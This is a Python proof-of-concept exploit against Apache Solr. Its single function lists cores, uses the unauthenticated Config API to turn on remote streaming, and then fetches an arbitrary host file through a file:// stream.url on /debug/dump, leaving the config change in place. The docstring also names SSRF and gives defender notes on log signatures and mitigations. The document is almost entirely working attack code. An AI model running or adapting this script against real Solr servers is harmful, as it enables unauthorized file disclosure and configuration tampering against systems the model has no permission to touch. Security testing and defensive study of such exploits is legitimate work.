import requests,json

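# Proof of concept for two issues reachable through Solr remote streaming:
#   - SSRF: the server fetches whatever URL is passed in stream.url
#   - file read: a file:// stream.url returns a file from the Solr host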
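def attack(host,filename):
    """Read a file from a Solr host by enabling remote streaming and requesting it back.

    The function sends three plain-HTTP requests, none carrying credentials:

    1. GET ``/solr/admin/cores`` and take the name of the core listed under
       the key ``"demo"``.
    2. POST a ``set-property`` command to that core's ``/config`` endpoint
       that turns on
       ``requestDispatcher.requestParsers.enableRemoteStreaming``.
    3. GET ``/debug/dump`` with ``stream.url=file://<filename>`` so that Solr
       opens the file itself and echoes the content in the response.

    Side effect: step 2 changes the core's configuration and this function
    never switches it back, so the setting has to be reverted on the test
    instance afterwards.

    Defender notes: the requests are recognisable in access logs as a POST
    to ``/solr/<core>/config`` whose body contains ``enableRemoteStreaming``,
    followed by a request carrying ``stream.url=file://``.  The chain only
    works when the Config API accepts edits from the caller; requiring
    authentication/authorization on Solr, keeping it off untrusted networks,
    or starting it with ``-Ddisable.configEdit=true`` breaks step 2.

    Args:
        host: ``host:port`` of the Solr instance, without a scheme.
        filename: absolute path on the Solr host, appended to ``file://``.

    Returns:
        The ``stream`` field of the first entry in the response's
        ``streams`` list, or the string ``"fail"`` when the core lookup or
        the final response does not have the expected shape.

    Raises:
        requests.RequestException: on connection errors or timeouts; network
            failures are deliberately not folded into ``"fail"``.
    """
    # Without a timeout, requests waits indefinitely on an unresponsive host.
    timeout = 10

    url1 = "http://{}/solr/admin/cores?indexInfo=false&wt=json".format(host)
    try:
        j = json.loads(requests.get(url1, timeout=timeout).text)
        dbname = j.get("status").get("demo").get("name")
    except (ValueError, AttributeError):
        # Non-JSON answer, or no core registered under "demo".
        return "fail"
    if not dbname:
        return "fail"

    url2 = "http://{}/solr/{}/config".format(host,dbname)
    payload = "{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}"
    headers = {
        'Content-Type': 'application/json'
    }
    # The response is not inspected; if the edit was rejected, the dump
    # request below simply will not contain a stream and "fail" is returned.
    requests.request("POST", url2, headers=headers, data=payload, timeout=timeout)

    url3 = "http://{}/solr/{}/debug/dump?param=ContentStreams&stream.url=file://{}".format(host,dbname,filename)
    resp = requests.get(url3, timeout=timeout)
    try:
        return json.loads(resp.text).get("streams")[0].get("stream")
    except (ValueError, AttributeError, TypeError, IndexError, KeyError):
        # Only parsing/shape errors are expected here; a bare ``except`` would
        # also have swallowed KeyboardInterrupt and SystemExit.
        return "fail"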

if __name__ == '__main__':
    # Default run targets a Solr instance on the local machine (port 8983)
    # and asks for /etc/hosts, then prints whatever attack() returned.
    result = attack("localhost:8983","/etc/hosts")
    print(result)


